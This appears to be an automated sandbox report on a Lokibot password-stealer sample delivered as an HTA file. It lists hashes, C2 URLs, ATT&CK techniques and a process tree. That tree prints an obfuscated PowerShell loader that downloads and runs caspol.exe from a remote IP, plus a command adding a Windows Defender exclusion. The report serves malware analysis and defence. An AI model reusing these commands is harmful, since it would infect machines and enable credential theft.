lokibot | dbcbb51e8c114fa8a7b9a1da2bbba100994eea4ed407bc338dedec5f811ade21

Analysis

max time kernel
138s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
18-11-2024 17:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.hta
Size

178KB
MD5

a54bdd270a424ec79b735ef6b513c2e4
SHA1

465738a3e31b16ad80c44f3dc7bdd762e402cb51
SHA256

dbcbb51e8c114fa8a7b9a1da2bbba100994eea4ed407bc338dedec5f811ade21
SHA512

598f303f9f570851f3e538dcd5d9e23717e177b3e652320a7d58dc4800a0f81d9445b719e51b0875b640460c1b4d6be7a592e738b1004c2c0490bffac8ba0c61
SSDEEP

96:4vCl1722AAZtbZfjdDINnmScJXD65zbfKZ/UQ:4vCld22AAVjBIcyzbfyUQ

Score

10^/10

lokibot collection defense_evasion discovery execution spyware stealer trojan

Malware Config

Extracted

Family

lokibot

http://94.156.177.95/maxzi/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Lokibot family
lokibot
Blocklisted process makes network request 1 IoCs

Processes:

pOWERSHELl.exE

flow pid process

17 3272 pOWERSHELl.exE
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

3312 powershell.exe
Downloads MZ/PE file
Evasion via Device Credential Deployment 2 IoCs
defense_evasion execution

Processes:

pOWERSHELl.exEpowershell.exe

pid process

3272 pOWERSHELl.exE
4788 powershell.exe

flow	pid	process
17	3272	pOWERSHELl.exE

pid	process
3312	powershell.exe

pid	process
3272	pOWERSHELl.exE
4788	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mshta.execaspol.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	caspol.exe

Executes dropped EXE 2 IoCs

Processes:

caspol.execaspol.exe

pid process

4480 caspol.exe
2812 caspol.exe
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

pid	process
4480	caspol.exe
2812	caspol.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

caspol.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	caspol.exe
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	caspol.exe
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	caspol.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

caspol.exe

description pid process target process

PID 4480 set thread context of 2812 4480 caspol.exe caspol.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	pid	process	target process
PID 4480 set thread context of 2812	4480	caspol.exe	caspol.exe

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

mshta.exepOWERSHELl.exEpowershell.execsc.execvtres.execaspol.exepowershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pOWERSHELl.exE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	caspol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

pOWERSHELl.exEpowershell.exepowershell.exe

pid process

3272 pOWERSHELl.exE
3272 pOWERSHELl.exE
4788 powershell.exe
4788 powershell.exe
3312 powershell.exe
3312 powershell.exe

pid	process
3272	pOWERSHELl.exE
3272	pOWERSHELl.exE
4788	powershell.exe
4788	powershell.exe
3312	powershell.exe
3312	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

pOWERSHELl.exEpowershell.exepowershell.execaspol.exe

description	pid	process
Token: SeDebugPrivilege	3272	pOWERSHELl.exE
Token: SeDebugPrivilege	4788	powershell.exe
Token: SeDebugPrivilege	3312	powershell.exe
Token: SeDebugPrivilege	2812	caspol.exe

Suspicious use of WriteProcessMemory 27 IoCs

Processes:

mshta.exepOWERSHELl.exEcsc.execaspol.exe

description	pid	process	target process
PID 60 wrote to memory of 3272	60	mshta.exe	pOWERSHELl.exE
PID 60 wrote to memory of 3272	60	mshta.exe	pOWERSHELl.exE
PID 60 wrote to memory of 3272	60	mshta.exe	pOWERSHELl.exE
PID 3272 wrote to memory of 4788	3272	pOWERSHELl.exE	powershell.exe
PID 3272 wrote to memory of 4788	3272	pOWERSHELl.exE	powershell.exe
PID 3272 wrote to memory of 4788	3272	pOWERSHELl.exE	powershell.exe
PID 3272 wrote to memory of 4432	3272	pOWERSHELl.exE	csc.exe
PID 3272 wrote to memory of 4432	3272	pOWERSHELl.exE	csc.exe
PID 3272 wrote to memory of 4432	3272	pOWERSHELl.exE	csc.exe
PID 4432 wrote to memory of 1568	4432	csc.exe	cvtres.exe
PID 4432 wrote to memory of 1568	4432	csc.exe	cvtres.exe
PID 4432 wrote to memory of 1568	4432	csc.exe	cvtres.exe
PID 3272 wrote to memory of 4480	3272	pOWERSHELl.exE	caspol.exe
PID 3272 wrote to memory of 4480	3272	pOWERSHELl.exE	caspol.exe
PID 3272 wrote to memory of 4480	3272	pOWERSHELl.exE	caspol.exe
PID 4480 wrote to memory of 3312	4480	caspol.exe	powershell.exe
PID 4480 wrote to memory of 3312	4480	caspol.exe	powershell.exe
PID 4480 wrote to memory of 3312	4480	caspol.exe	powershell.exe
PID 4480 wrote to memory of 2812	4480	caspol.exe	caspol.exe
PID 4480 wrote to memory of 2812	4480	caspol.exe	caspol.exe
PID 4480 wrote to memory of 2812	4480	caspol.exe	caspol.exe
PID 4480 wrote to memory of 2812	4480	caspol.exe	caspol.exe
PID 4480 wrote to memory of 2812	4480	caspol.exe	caspol.exe
PID 4480 wrote to memory of 2812	4480	caspol.exe	caspol.exe
PID 4480 wrote to memory of 2812	4480	caspol.exe	caspol.exe
PID 4480 wrote to memory of 2812	4480	caspol.exe	caspol.exe
PID 4480 wrote to memory of 2812	4480	caspol.exe	caspol.exe

outlook_office_path 1 IoCs

Processes:

caspol.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	caspol.exe

outlook_win_path 1 IoCs

Processes:

caspol.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	caspol.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:60
- C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE
  "C:\Windows\SysTEM32\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE" "PowERShell.EXE -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT ; iNvOkE-EXprEssion($(invOkE-exPreSSIoN('[sYsteM.tEXT.EncOdInG]'+[CHar]0X3A+[CHaR]0x3A+'Utf8.GEtsTriNG([sYSTEm.CONvErT]'+[ChAr]0x3a+[CHar]58+'fROMbasE64string('+[char]34+'JEFIQ2MxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJlUkRlRmlOaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3piR3Ysc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZEdvU2hpRWwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZZTGlNem4sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYkcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNQmdOa1F0IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLWHhFWHhxZEVFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSENjMTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzY2LjYzLjE4Ny4yMzEvNjU3L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtTVGFSVC1zbGVFcCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGNhc3BvbC5leGUi'+[ChAR]34+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3272
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4788
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ea3hgzpi\ea3hgzpi.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4432
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC4D6.tmp" "c:\Users\Admin\AppData\Local\Temp\ea3hgzpi\CSCE71D07FAD11D4C73A0B30F9B6F09DE.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1568
- - C:\Users\Admin\AppData\Roaming\caspol.exe
    "C:\Users\Admin\AppData\Roaming\caspol.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4480
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3312
  - - C:\Users\Admin\AppData\Roaming\caspol.exe
      "C:\Users\Admin\AppData\Roaming\caspol.exe"
      4⤵
      Executes dropped EXE
      Accesses Microsoft Outlook profiles
      Suspicious use of AdjustPrivilegeToken
      outlook_office_path
      outlook_win_path
      PID:2812

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pOWERSHELl.exE.log

Filesize
2KB

MD5
3d086a433708053f9bf9523e1d87a4e8

SHA1
b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

SHA256
6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

SHA512
931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
07be4d0fdbac07bf754c38008740708e

SHA1
d1306993e7f7a32d6350335ca596e801bacaf2b2

SHA256
f002c91f2f3adaf55ce5c7fc82d4022a5917e31768620361f2872ad3e6ad03cc

SHA512
434c329e9b2ea8f75eafa699cdce8bc54f7087eb8838de604c4bf8974526c2e8cfb11af8410e2b777340d895b6335b804b1ba9b3550c3f86befcc9f3275b4331

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC4D6.tmp

Filesize
1KB

MD5
48916998015d87d5c59a902dbe60040e

SHA1
c21f58065ae667e6ab7ed5227a392b5c4b075b00

SHA256
7dcfcb96759e6a2e671653b170b6b063c23c231fa4ce30dd705e1ff529ad56e5

SHA512
b9c6d097bc599b87d8b83c81b0665d1fa473dd0b2e6ee5b0c52fd330106b8f4ee77a1e717f9d1b8c9ba1d4cb0bab3023e68163152316ff1c1b41e6da214c0472

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_clrvzisl.ji2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ea3hgzpi\ea3hgzpi.dll

Filesize
3KB

MD5
cc99e59c6b2216c1f9927fc1a58b79b6

SHA1
a93189d0792bbafae636c647de8e4f4c5caead19

SHA256
bf1dff854150dc7594261d71a613bc7440df768c44a938cd93c0e4a878bface1

SHA512
57ddb596b7e36dc9fad5dacd99ac5df8ed2ef70fe248febffcd1a945ab096aa9bb04badf6cda20318243efbb16327568f934d827cd4cbc198839363619978b8f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2045521122-590294423-3465680274-1000\0f5007522459c86e95ffcc62f32308f1_896de533-e5fb-4eb9-8f2b-d363f3584dc5

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2045521122-590294423-3465680274-1000\0f5007522459c86e95ffcc62f32308f1_896de533-e5fb-4eb9-8f2b-d363f3584dc5

Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
C:\Users\Admin\AppData\Roaming\caspol.exe

Filesize
570KB

MD5
80358303e33cef71434e6e4a621262c5

SHA1
e7a22b4e5af741f9b4d9982f36164b276bba459a

SHA256
f3246d0ca5ca8e69f98ca33b2c17813d5d862049dcfa9931dbcbaaaf7543a1f7

SHA512
5e68b8c63afe7c0e91396f42f485cd84946235ab11d9ce7107bbcf75568ff3087d5e14378f87d77733376e332f516f26db838b870ca580569178b15c0a90761e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ea3hgzpi\CSCE71D07FAD11D4C73A0B30F9B6F09DE.TMP

Filesize
652B

MD5
abe5451534c23be92006a01508180c9b

SHA1
86b7c70424c1e4bd53340d214752a7b45eae17a4

SHA256
260ef9f4c2b191e24259b18a279d13333fa3014bd4d9884d8386cc3116800db4

SHA512
1656096d93175f10c9127dfdfbb73a3720e6a5df360feadf5237152300b6e03e0c9f4e461f5f28e2a6d008aeee88333bb53cdd35ec96e8073b7c5bfd638f1ed5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ea3hgzpi\ea3hgzpi.0.cs

Filesize
477B

MD5
f97fc8141f59078b4354b513d3b083ac

SHA1
293904ab8d5f38a2f0764ee2e35e97e590d8c737

SHA256
f6766cc467b91c9c99186a91d4cc32ebf6803b04c9e82ba8dedd54f9dc25b32e

SHA512
87b65e67e76c334c79481d25513fb1696ab86b1d8bf6006b7436a5ba7e522e2101912315c16d92cb0bf0feb86aa9616d5ea1019054c489958ca364947abe879c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ea3hgzpi\ea3hgzpi.cmdline

Filesize
369B

MD5
e92e039c91398f8086dbe3b2c87db551

SHA1
790f812c1ae825471e731e40b50cb4d11c76973b

SHA256
a7321fe8f38f98d54d43c529706f639ce47b7927e7fbd825e6bfdadd8984083f

SHA512
bcce78976a0a6d49f80dea0c0bd596e200d1f44a345793050a255f69f626d6ca96fc634915d428723fd22a062b5745e0dce5e8c90929aaf6dd0c1b74de98ab80

Download Submit
memory/2812-91-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/2812-93-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/3272-16-0x0000000005CB0000-0x0000000005D16000-memory.dmp

Filesize
408KB

Download
memory/3272-3-0x0000000005510000-0x0000000005B38000-memory.dmp

Filesize
6.2MB

Download
memory/3272-1-0x0000000004E70000-0x0000000004EA6000-memory.dmp

Filesize
216KB

Download
memory/3272-73-0x0000000071350000-0x0000000071B00000-memory.dmp

Filesize
7.7MB

Download
memory/3272-72-0x0000000071350000-0x0000000071B00000-memory.dmp

Filesize
7.7MB

Download
memory/3272-71-0x000000007135E000-0x000000007135F000-memory.dmp

Filesize
4KB

Download
memory/3272-65-0x0000000006A00000-0x0000000006A08000-memory.dmp

Filesize
32KB

Download
memory/3272-19-0x0000000006450000-0x000000000649C000-memory.dmp

Filesize
304KB

Download
memory/3272-18-0x0000000006410000-0x000000000642E000-memory.dmp

Filesize
120KB

Download
memory/3272-0-0x000000007135E000-0x000000007135F000-memory.dmp

Filesize
4KB

Download
memory/3272-83-0x0000000071350000-0x0000000071B00000-memory.dmp

Filesize
7.7MB

Download
memory/3272-17-0x0000000006040000-0x0000000006394000-memory.dmp

Filesize
3.3MB

Download
memory/3272-6-0x0000000005B40000-0x0000000005BA6000-memory.dmp

Filesize
408KB

Download
memory/3272-5-0x0000000005450000-0x0000000005472000-memory.dmp

Filesize
136KB

Download
memory/3272-4-0x0000000071350000-0x0000000071B00000-memory.dmp

Filesize
7.7MB

Download
memory/3272-2-0x0000000071350000-0x0000000071B00000-memory.dmp

Filesize
7.7MB

Download
memory/3312-122-0x00000000079E0000-0x00000000079F4000-memory.dmp

Filesize
80KB

Download
memory/3312-104-0x0000000005FF0000-0x0000000006344000-memory.dmp

Filesize
3.3MB

Download
memory/3312-106-0x00000000069C0000-0x0000000006A0C000-memory.dmp

Filesize
304KB

Download
memory/3312-110-0x000000006DD00000-0x000000006DD4C000-memory.dmp

Filesize
304KB

Download
memory/3312-120-0x0000000007650000-0x00000000076F3000-memory.dmp

Filesize
652KB

Download
memory/3312-121-0x00000000079A0000-0x00000000079B1000-memory.dmp

Filesize
68KB

Download
memory/4480-87-0x0000000005DC0000-0x0000000005DCA000-memory.dmp

Filesize
40KB

Download
memory/4480-88-0x0000000006740000-0x00000000067DC000-memory.dmp

Filesize
624KB

Download
memory/4480-82-0x0000000000FC0000-0x0000000001054000-memory.dmp

Filesize
592KB

Download
memory/4480-90-0x0000000007B00000-0x0000000007B64000-memory.dmp

Filesize
400KB

Download
memory/4480-84-0x0000000005DE0000-0x0000000006384000-memory.dmp

Filesize
5.6MB

Download
memory/4480-85-0x0000000005910000-0x00000000059A2000-memory.dmp

Filesize
584KB

Download
memory/4480-86-0x0000000005B10000-0x0000000005BBA000-memory.dmp

Filesize
680KB

Download
memory/4480-89-0x0000000006810000-0x0000000006822000-memory.dmp

Filesize
72KB

Download
memory/4788-47-0x00000000074B0000-0x00000000074BE000-memory.dmp

Filesize
56KB

Download
memory/4788-48-0x00000000074C0000-0x00000000074D4000-memory.dmp

Filesize
80KB

Download
memory/4788-49-0x00000000075D0000-0x00000000075EA000-memory.dmp

Filesize
104KB

Download
memory/4788-50-0x0000000007500000-0x0000000007508000-memory.dmp

Filesize
32KB

Download
memory/4788-46-0x0000000007480000-0x0000000007491000-memory.dmp

Filesize
68KB

Download
memory/4788-45-0x0000000007510000-0x00000000075A6000-memory.dmp

Filesize
600KB

Download
memory/4788-44-0x00000000072E0000-0x00000000072EA000-memory.dmp

Filesize
40KB

Download
memory/4788-43-0x0000000007280000-0x000000000729A000-memory.dmp

Filesize
104KB

Download
memory/4788-42-0x00000000078D0000-0x0000000007F4A000-memory.dmp

Filesize
6.5MB

Download
memory/4788-41-0x00000000071A0000-0x0000000007243000-memory.dmp

Filesize
652KB

Download
memory/4788-40-0x0000000006540000-0x000000000655E000-memory.dmp

Filesize
120KB

Download
memory/4788-30-0x000000006DC10000-0x000000006DC5C000-memory.dmp

Filesize
304KB

Download
memory/4788-29-0x0000000006F60000-0x0000000006F92000-memory.dmp

Filesize
200KB

Download